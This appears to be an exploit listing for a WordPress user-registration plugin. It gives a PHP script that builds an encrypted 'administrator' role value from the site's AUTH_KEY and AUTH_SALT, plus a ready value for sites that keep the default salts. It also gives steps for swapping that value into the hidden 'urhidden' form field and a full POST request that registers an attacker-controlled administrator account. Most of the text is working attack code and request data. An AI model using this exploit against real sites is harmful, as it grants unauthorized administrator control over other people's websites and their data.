## https://sploitus.com/exploit?id=WPEX-ID:9486744E-AB24-44E4-B06E-9E0B4BE132E2
Generate the encrypted string for 'administrator' via the script below. If the default salts/keys are used in the wp-config.php file then the encrypted string for an administrator account is: "bXFaYVc1WjJlNzlXTXRsbkxSZFptdz09"
<?php
$secret_key = 'REPLACE_ME_WITH_AUTH_KEY'; // AUTH_KEY
$secret_iv = 'REPLACE_ME_WITH_AUTH_SALT'; // AUTH_SALT
$encrypt_method = 'AES-256-CBC';
$key = hash( 'sha256', $secret_key );
$iv = substr( hash( 'sha256', $secret_iv ), 0, 16 );
$encoded_id = base64_encode( openssl_encrypt( 'administrator', $encrypt_method, $key, 0, $iv ) );
echo $encoded_id . "\r\n";
?>
1. Visit the registration page of the plugin
2. Edit the form HTML and change the input "urhidden" to the generated encrypted value
3. Submit the registration, you will now have an administrator level account.
POST /wpuf-registration/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Connection: close
Upgrade-Insecure-Requests: 1
reg_fname=Attacker®_lname=Admin®_email=attacker%40localhost.org&log=attacker&pwd1=Passw0rd&pwd2=Passw0rd&wp-submit=Register&urhidden=XXXXXXXXXXXXXXXXXXXX&wpuf_registration=true&action=registration&_wpnonce=b6c5a58299